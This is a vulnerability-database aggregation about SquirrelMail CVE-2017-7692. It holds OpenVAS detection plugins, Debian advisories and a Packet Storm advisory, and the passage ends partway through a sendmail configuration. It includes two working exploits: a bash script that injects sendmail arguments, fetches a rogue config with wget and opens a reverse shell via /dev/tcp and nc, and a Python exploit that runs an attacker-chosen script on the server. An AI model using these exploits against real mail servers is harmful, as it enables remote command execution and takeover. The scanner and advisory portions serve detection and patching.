Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872733\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-06-03 07:04:06 +0200 (Sat, 03 Jun 2017)\");\n script_cve_id(\"CVE-2017-7692\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for squirrelmail FEDORA-2017-0b6da97aa5\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'squirrelmail'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"squirrelmail on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-0b6da97aa5\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AFXDNLFX6XYCTBMHOMFBRMMSCSJV6VAE\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"squirrelmail\", rpm:\"squirrelmail~1.4.22~19.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-01-29T20:09:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "description": "Dawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. This\nwould allow a logged-in user to run arbitrary commands on the server.", "modified": "2020-01-29T00:00:00", "published": "2018-01-25T00:00:00", "id": "OPENVAS:1361412562310890941", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310890941", "type": "openvas", "title": "Debian LTS: Security Advisory for squirrelmail (DLA-941-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.890941\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-7692\");\n script_name(\"Debian LTS: Security Advisory for squirrelmail (DLA-941-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-01-25 00:00:00 +0100 (Thu, 25 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/05/msg00012.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"squirrelmail on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n2:1.4.23~svn20120406-2+deb7u1.\n\nWe recommend that you upgrade your squirrelmail packages.\");\n\n script_tag(name:\"summary\", value:\"Dawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. 
This\nwould allow a logged-in user to run arbitrary commands on the server.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"squirrelmail\", ver:\"2:1.4.23~svn20120406-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8741", "CVE-2017-7692"], "description": "SquirrelMail is prone to authenticated remote code execution\n and directory traversal vulnerabilities.", "modified": "2019-03-07T00:00:00", "published": "2017-04-21T00:00:00", "id": "OPENVAS:1361412562310106785", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106785", "type": "openvas", "title": "SquirrelMail < 1.4.23 Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_squirrelmail_rce_vuln.nasl 14033 2019-03-07 11:09:35Z cfischer $\n#\n# SquirrelMail < 1.4.23 Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:squirrelmail:squirrelmail';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106785\");\n script_version(\"$Revision: 14033 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-07 12:09:35 +0100 (Thu, 07 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-21 17:09:27 +0200 (Fri, 21 Apr 2017)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-7692\", \"CVE-2018-8741\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n\n script_name(\"SquirrelMail < 1.4.23 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"squirrelmail_detect.nasl\");\n script_mandatory_keys(\"squirrelmail/installed\");\n\n script_tag(name:\"summary\", value:\"SquirrelMail is prone to authenticated remote code execution\n and directory traversal vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"SquirrelMail allows:\n\n - post-authentication remote code execution via a sendmail.cf file that is mishandled in a popen call.\n It's possible to exploit this vulnerability to execute arbitrary shell commands on the remote server.\n\n - uploading a mail attachment a temporary file is generated on the server that the client later 
references\n when sending the mail. The filename is not sanitized in any way, so by passing a filename of the form\n '../../../../some_path/some_filename' one can use this to attach arbitrary files from the server that can\n be accessed by the PHP process to a mail.\");\n\n script_tag(name:\"impact\", value:\"An authenticated attacker may execute arbitrary shell commands or\n read files from the filesystem.\");\n\n script_tag(name:\"affected\", value:\"SquirrelMail 1.4.22 and prior as well as the trunk version\n (before r14650).\");\n\n script_tag(name:\"solution\", value:\"Source-Code patches for both issues are available in the linked references.\");\n\n script_xref(name:\"URL\", value:\"https://www.wearesegment.com/research/Squirrelmail-Remote-Code-Execution.html\");\n script_xref(name:\"URL\", value:\"https://insinuator.net/2018/03/squirrelmail-full-disclosure-troopers18/\");\n script_xref(name:\"URL\", value:\"https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html\");\n script_xref(name:\"URL\", value:\"https://gist.github.com/hannob/3c4f86863c418930ad08853c1109364e\");\n script_xref(name:\"URL\", value:\"https://sourceforge.net/p/squirrelmail/code/14650/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_less_equal(version: version, test_version: \"1.4.22\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See reference\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:49", "description": "\nSquirrelMail 1.4.22 - Remote Code Execution", "edition": 1, "published": "2017-04-23T00:00:00", "title": "SquirrelMail 1.4.22 - Remote Code Execution", "type": "exploitpack", "bulletinFamily": 
"exploit", "cvelist": ["CVE-2017-7692"], "modified": "2017-04-23T00:00:00", "id": "EXPLOITPACK:5A207B9957580AC118ED163D0FEC5A56", "href": "", "sourceData": "#!/bin/bash\n#\nint='\\033[94m\n __ __ __ __ __ \n / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________\n / / / _ \\/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \\/ ___/ ___/\n / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) \n /_____/\\___/\\__, /\\__,_/_/ /_/ /_/\\__,_/\\___/_/|_|\\___/_/ /____/ \n /____/ \n\nSquirrelMail <= 1.4.23 Remote Code Execution PoC Exploit (CVE-2017-7692)\n\nSquirrelMail_RCE_exploit.sh (ver. 1.1)\n\nDiscovered and coded by \n\nDawid Golunski (@dawid_golunski)\nhttps://legalhackers.com\n\nExploitBox project:\nhttps://ExploitBox.io\n\n\\033[0m'\n\n# Quick and messy PoC for SquirrelMail webmail application.\n# It contains payloads for 2 vectors:\n# * File Write\n# * RCE \n# It requires user credentials and that SquirrelMail uses \n# Sendmail method as email delivery transport\n#\n#\n# Full advisory URL:\n# https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html\n# Exploit URL:\n# https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh\n#\n# Tested on: # Ubuntu 16.04 \n# squirrelmail package version:\n# 2:1.4.23~svn20120406-2ubuntu1.16.04.1 \n#\n# Disclaimer:\n# For testing purposes only\n#\n#\n# -----------------------------------------------------------------\n#\n# Interested in vulns/exploitation? \n# Stay tuned for my new project - ExploitBox\n# \n# .;lc' \n# .,cdkkOOOko;. \n# .,lxxkkkkOOOO000Ol' \n# .':oxxxxxkkkkOOOO0000KK0x:' \n# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;. \n# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl. \n# '';ldxxxxxdc,. ,oOXXXNNNXd;,. \n# .ddc;,,:c;. ,c: .cxxc:;:ox: \n# .dxxxxo, ., ,kMMM0:. ., .lxxxxx: \n# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx: \n# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx: \n# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx: \n# .dxxxxxc lddOMMMMWd0MMMMKddd. 
.xxxxxx: \n# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx: \n# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx: \n# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx: \n# .dxxxxxdl;. ., .. .;cdxxxxxx: \n# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx: \n# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,. \n# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:. \n# .':oxxxxxxxxx.ckkkkkkkkxl,. \n# .,cdxxxxx.ckkkkkxc. \n# .':odx.ckxl,. \n# .,.'. \n#\n# https://ExploitBox.io\n#\n# https://twitter.com/Exploit_Box\n#\n# -----------------------------------------------------------------\n\nsqspool=\"/var/spool/squirrelmail/attach/\"\n\necho -e \"$int\"\n#echo -e \"\\033[94m \\nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \\n\"\n#echo -e \"SquirrelMail_RCE_exploit.sh (ver. 1.0)\\n\"\n#echo -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttps://legalhackers.com \\033[0m\\n\\n\"\n\n\n# Base URL\nif [ $# -ne 1 ]; then\n\techo -e \"Usage: \\n$0 SquirrelMail_URL\"\n\techo -e \"Example: \\n$0 http://target/squirrelmail/ \\n\"\n\t\n\texit 2\nfi\nURL=\"$1\"\n\n# Log in\necho -e \"\\n[*] Enter SquirrelMail user credentials\"\nread -p \"user: \" squser\nread -sp \"pass: \" sqpass\n\necho -e \"\\n\\n[*] Logging in to SquirrelMail at $URL\"\ncurl -s -D /tmp/sqdata -d\"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1\" $URL/src/redirect.php | grep -q incorrect\nif [ $? 
-eq 0 ]; then\n\techo \"Invalid creds\"\n\texit 2\nfi\nsessid=\"`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`\"\nkeyid=\"`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`\"\n\n\n# Prepare Sendmail cnf\n#\n# * The config will launch php via the following stanza:\n# \n# Mlocal,\tP=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,\n# \t\tT=DNS/RFC822/X-Unix,\n# \t\tA=php -- $u $h ${client_addr}\n#\nwget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf\n\n# Upload config\necho -e \"\\n\\n[*] Uploading Sendmail config\"\ntoken=\"`curl -s -b\"SQMSESSID=$sessid; key=$keyid\" \"$URL/src/compose.php?mailbox=INBOX&startMessage=1\" | grep smtoken | awk -F'value=\"' '{print $2}' | cut -d'\"' -f1 `\"\nattachid=\"`curl -H \"Expect:\" -s -b\"SQMSESSID=$sessid; key=$keyid\" -F\"smtoken=$token\" -F\"send_to=$mail\" -F\"subject=attach\" -F\"body=test\" -F\"attachfile=@/tmp/smcnf-exp\" -F\"username=$squser\" -F\"attach=Add\" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'\"' '{print $2}' | tr -d '\\n'`\"\nif [ ${#attachid} -lt 32 ]; then\n\techo \"Something went wrong. Failed to upload the sendmail file.\"\n\texit 2\nfi\n\n# Create Sendmail cmd string according to selected payload\necho -e \"\\n\\n[?] 
Select payload\\n\"\n# SELECT PAYLOAD\necho \"1 - File write (into /tmp/sqpoc)\"\necho \"2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)\"\necho\nread -p \"[1-2] \" pchoice\n\ncase $pchoice in\n\t1) payload=\"$squser@localhost\t-oQ/tmp/\t-X/tmp/sqpoc\" \n\t ;;\n\n\t2) payload=\"$squser@localhost\t-oQ/tmp/\t-C$sqspool/$attachid\" \n\t ;;\nesac\n\nif [ $pchoice -eq 2 ]; then\n\techo\n\tread -p \"Reverese shell IP: \" reverse_ip\n\tread -p \"Reverese shell PORT: \" reverse_port\nfi\n\n# Reverse shell code\nphprevsh=\"\n<?php \n\t\\$cmd = \\\"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\\\";\n\tfile_put_contents(\\\"/tmp/cmd\\\", 'export PATH=\\\"\\$PATH\\\" ; export TERM=vt100 ;' . \\$cmd);\n\tsystem(\\\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\\\");\n?>\"\n\n\n# Set sendmail params in user settings\necho -e \"\\n[*] Injecting Sendmail command parameters\"\ntoken=\"`curl -s -b\"SQMSESSID=$sessid; key=$keyid\" \"$URL/src/options.php?optpage=personal\" | grep smtoken | awk -F'value=\"' '{print $2}' | cut -d'\"' -f1 `\"\ncurl -s -b\"SQMSESSID=$sessid; key=$keyid\" -d \"smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit\" --data-urlencode \"new_email_address=$payload\" \"$URL/src/options.php?optpage=personal\" | grep -q 'Success' 2>/dev/null\nif [ $? 
-ne 0 ]; then\n\techo \"Failed to inject sendmail parameters\"\n\texit 2\nfi\n\n# Send email which triggers the RCE vuln and runs phprevsh\necho -e \"\\n[*] Sending the email to trigger the vuln\"\n(sleep 2s && curl -s -D/tmp/sheaders -b\"SQMSESSID=$sessid; key=$keyid\" -d\"smtoken=$token\" -d\"startMessage=1\" -d\"session=0\" \\\n-d\"send_to=$squser@localhost\" -d\"subject=poc\" --data-urlencode \"body=$phprevsh\" -d\"send=Send\" -d\"username=$squser\" $URL/src/compose.php) &\n\nif [ $pchoice -eq 2 ]; then\n\techo -e \"\\n[*] Waiting for shell on $reverse_ip port $reverse_port\"\n\tnc -vv -l -p $reverse_port\nelse\n\techo -e \"\\n[*] The test file should have been written at /tmp/sqpoc\"\nfi\n\ngrep -q \"302 Found\" /tmp/sheaders\nif [ $? -eq 1 ]; then\n\techo \"There was a problem with sending email\"\n\texit 2\nfi\n\n\n# Done\necho -e \"\\n[*] All done. Exiting\"", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:22:12", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7692"], "description": "Package : squirrelmail\nVersion : 2:1.4.23~svn20120406-2+deb7u1\nCVE ID : CVE-2017-7692\n\nDawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. 
This\nwould allow a logged-in user to run arbitrary commands on the server.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n2:1.4.23~svn20120406-2+deb7u1.\n\nWe recommend that you upgrade your squirrelmail packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 2, "modified": "2017-05-15T09:16:56", "published": "2017-05-15T09:16:56", "id": "DEBIAN:DLA-941-1:C74C1", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201705/msg00012.html", "title": "[SECURITY] [DLA 941-1] squirrelmail security update", "type": "debian", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:59", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7692"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3852-1 security@debian.org\nhttps://www.debian.org/security/ Sebastien Delafond\nMay 13, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : squirrelmail\nCVE ID : CVE-2017-7692\n\nDawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. 
This\nwould allow a logged-in user to run arbitrary commands on the server.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2:1.4.23~svn20120406-2+deb8u1.\n\nWe recommend that you upgrade your squirrelmail packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2017-05-13T11:36:13", "published": "2017-05-13T11:36:13", "id": "DEBIAN:DSA-3852-1:F4146", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00111.html", "title": "[SECURITY] [DSA 3852-1] squirrelmail security update", "type": "debian", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2017-04-20T01:25:05", "description": "", "published": "2017-04-19T00:00:00", "type": "packetstorm", "title": "Squirrelmail 1.4.22 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7692"], "modified": "2017-04-19T00:00:00", "id": "PACKETSTORM:142212", "href": "https://packetstormsecurity.com/files/142212/Squirrelmail-1.4.22-Remote-Code-Execution.html", "sourceData": "`Advisory ID: SGMA17-001 \nTitle: Squirrelmail Remote Code Execution \nProduct: Squirrelmail \nVersion: 1.4.22 and probably prior \nVendor: squirrelmail.org \nType: Command Injection \nRisk level: 4 / 5 \nCredit: filippo.cavallarin@wearesegment.com \nCVE: CVE-2017-7692 \nVendor notification: 2017-04-04 \nVendor fix: N/A \nPublic disclosure: 2017-04-19 \n \n \n \n \nDETAILS \n \nSquirrelmail version 1.4.22 (and probably prior) is vulnerable to a remote code execution vulnerability because \nit fails to sanitize a string before passing it to a popen call. It's possible to exploit this vulnerability to \nexecute arbitrary shell commands on the remote server. 
\n \nThe problem is in Deliver_SendMail.class.php on initStream function that uses escapeshellcmd() to sanitize the \nsendmail command before executing it. The use of escapeshellcmd() is not correct in this case since it don't \nescapes whitespaces allowing the injection of arbitrary command parameters. \n \n$this->sendmail_command = \"$sendmail_path $this->sendmail_args -f$envelopefrom\"; \n$stream = popen(escapeshellcmd($this->sendmail_command), \"w\"); \n \n \nThe $envelopefrom variable is controlled by the attacker, hence it's possible to trick sendmail to use an \nattacker-provided configuration file that triggers the execution of an arbitrary command. \n \nIn order to exploit this vulnerability the MTA in use must be sendmail and Squirrelmail must be configured \nto use it as commandline (useSendmail directive of the config file set to true). \nAlso, the edit_identity directive of the config file must be bet to true, but this is the default configuration. \n \nTo reproduce the issue follow these steps: \n1. Create a rogue sendmail.cf that triggers the execution of a /usr/bin/touch: \n[...] \nMlocal, P=/usr/bin/touch, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, \nT=DNS/RFC822/X-Unix, \nA=X /tmp/executed \n2. Upload it as a mail attachment and get it's remote name (ex: lF51mGPJwdqzV3LEDlCdSVNpohzgF7sD) \n3. Go to Options -> Personal Informations and set the following payload as Email Address: \n<aaa@abc.com -OQueueDirectory=/tmp -C /var/local/squirrelmail/attach/lF51mGPJwdqzV3LEDlCdSVNpohzgF7sD> \n4. Send an email \n5. Verify the execution of the command with \"ls /tmp/executed\" on the remote server \n \n \n \n \nPROOF OF CONCEPT \n \nThe followig python script exploits this vulnerability to execute an attacker provided bash script on the remote server. 
\n \nBOF \n#!/usr/bin/env python \n# -*- coding: utf-8 -*- \n \n\"\"\" \n \nSquirrelMail 1.4.22 Remote Code Execution (authenticated) \nExploit code for CVE-2017-7692 \nfilippo.cavallarin@wearesegment.com \n \n\"\"\" \n \nfrom __future__ import unicode_literals \nimport sys \nimport os \nimport re \nimport requests \n \nreload(sys) \nsys.setdefaultencoding('utf8') \n \n \nSENDMAILCF=\"/tmp/squirrelmail1_4_22-sendmailcf-rce\" \nCOMPOSE = \"/src/compose.php\" \nINFOS = \"/src/options.php?optpage=personal\" \nSQM_ATTACH_PATH = \"/var/local/squirrelmail/attach/\" \n# must be enclosed in <> otherwise spaces will be removed .. \nSENDER = \"<px@xxxx.com -OQueueDirectory=/tmp -C %s%s>\" \n \n \nSESSID = \"\" \nBASEURL = \"\" \n \n \ndef attach(attachment): \nurl = \"%s%s\" % (BASEURL, COMPOSE) \ntoken = get_csrf_token(url) \n \nvalues = { \n\"smtoken\": token, \n\"attach\": \"add\" \n} \n \ntry: \nfiles = {'attachfile': open(attachment,'rb')} \nresp = requests.post(url, files=files, data=values, cookies={'SQMSESSID':SESSID}) \nfname = re.search(r'att_local_name\";s:[0-9]+:\"([a-zA-Z0-9]+)\"', resp.text) \nif not fname: \nprint \"\\nError: unable to upload file %s\" % attachment \nreturn fname.group(1) \n \nexcept Exception as e: \nprint \"\\nError: %s\" % e \nsys.exit(1) \n \n \ndef send(): \nurl = \"%s%s\" % (BASEURL, COMPOSE) \ntoken = get_csrf_token(url) \n \nvalues = { \n\"smtoken\": token, \n\"send_to\": \"root\", \n\"send\": \"Send\" \n} \n \ntry: \nresp = requests.post(url, data=values, cookies={'SQMSESSID':SESSID}) \nexcept Exception as e: \nprint \"\\nError: %s\" % e \nsys.exit(1) \n \n \ndef set_identity(sender): \nurl = \"%s%s\" % (BASEURL, INFOS) \ntoken = get_csrf_token(url) \nvalues = { \n\"smtoken\": token, \n\"optpage\": \"personal\", \n\"optmode\": \"submit\", \n\"new_email_address\": sender, \n\"submit_personal\": \"Submit\" \n} \n \ntry: \nrequests.post(url, data=values, cookies={'SQMSESSID':SESSID}) \nexcept Exception as e: \nprint \"\\nError: %s\" % e 
\nsys.exit(1) \n \n \ndef get_csrf_token(url): \ntry: \nbody = requests.get(url, cookies={'SQMSESSID':SESSID}).text \ninp = re.search(r'<input.*name=\"smtoken\".*>', body, re.MULTILINE) \ntoken = re.search(r'value=\"([a-zA-Z0-9]+)\"', inp.group(0)) \nif token: \nreturn token.group(1) \nexcept Exception as e: \npass \n \nprint \"\\nUnable to get CSRF token\" \nsys.exit(1) \n \ndef outw(s): \nsys.stdout.write(s) \nsys.stdout.flush() \n \ndef main(argv): \nglobal BASEURL \nglobal SESSID \n \nif len(argv) != 4: \nprint ( \n\"SquirrelMail 1.4.22 Remote Code Execution (authenticated) - filippo.cavallarin@wearesegment.com\\n\" \n\"The target server must use sendmail and squirrelmail must be configured to use /usr/bin/sendmail\\n\" \n\"Usage:\\n\" \n\" %s <url> <session_id> <script>\\n\" \n\" url: the url of squirrelmail\\n\" \n\" session_id: the value of SQMSESSID cookie\\n\" \n\" script: the path to the bash script to be executed on the target\\n\" \n\"Example:\\n\" \n\" %s http:/example.com/squirrelmail/ l2rapvcovsui1on0b4i5boev24 reverseshell.sh\" \n) % (argv[0], argv[0]) \n \nsys.exit(1) \n \nBASEURL = argv[1] \nSESSID = argv[2] \nscript = argv[3] \n \noutw(\"Uploading script ... \") \nscript_fname = attach(script) \nprint \"ok\" \n \n \noutw(\"Generating sendmail.cf ... \") \ntry: \nscript_path = \"%s%s\" % (SQM_ATTACH_PATH, script_fname) \nwith open(SENDMAILCF, 'w') as f: \nf.write(SENDMAILCF_CONTENT % script_path) \nexcept Exception as e: \nprint \"\\nError: %s\" % e \nsys.exit(1) \nprint \"ok\" \n \noutw(\"Uploading sendmail.cf ... \") \nsmc_fname = attach(SENDMAILCF) \nos.remove(SENDMAILCF) \nprint \"ok\" \n \noutw(\"Updating user options ... \") \nsender = SENDER % (SQM_ATTACH_PATH, smc_fname) \nset_identity(sender) \nprint \"ok\" \n \noutw(\"Checking identity field ... \") \nicheck = requests.get(\"%s%s\" % (BASEURL, INFOS), cookies={'SQMSESSID':SESSID}).text \nif not smc_fname in icheck: \nprint \"\\nError: unable to set identity field .. 
maybe squirrelmail is configured with edit_identity=false\" \nsys.exit(1) \nprint \"ok\" \n \noutw(\"Executing script ... \") \nsend() \nprint \"ok\\n\" \nsys.exit(0) \n \nSENDMAILCF_CONTENT = \"\"\" \nO DontBlameSendmail=,AssumeSafeChown,ForwardFileInGroupWritableDirPath,GroupWritableForwardFileSafe,GroupWritableIncludeFileSafe,IncludeFileInGroupWritableDirPath,DontWarnForwardFileInUnsafeDirPath,TrustStickyBit,NonRootSafeAddr,GroupWritableIncludeFile,GroupReadableDefaultAuthInfoFile \nKdequote dequote \nScanonify=3 \nR$@ $@ <@> \nR$* $: $1 <@> mark addresses \nR$* < $* > $* <@> $: $1 < $2 > $3 unmark <addr> \nR@ $* <@> $: @ $1 unmark @host:... \nR$* [ IPv6 : $+ ] <@> $: $1 [ IPv6 : $2 ] unmark IPv6 addr \nR$* :: $* <@> $: $1 :: $2 unmark node::addr \nR:include: $* <@> $: :include: $1 unmark :include:... \nR$* : $* [ $* ] $: $1 : $2 [ $3 ] <@> remark if leading colon \nR$* : $* <@> $: $2 strip colon if marked 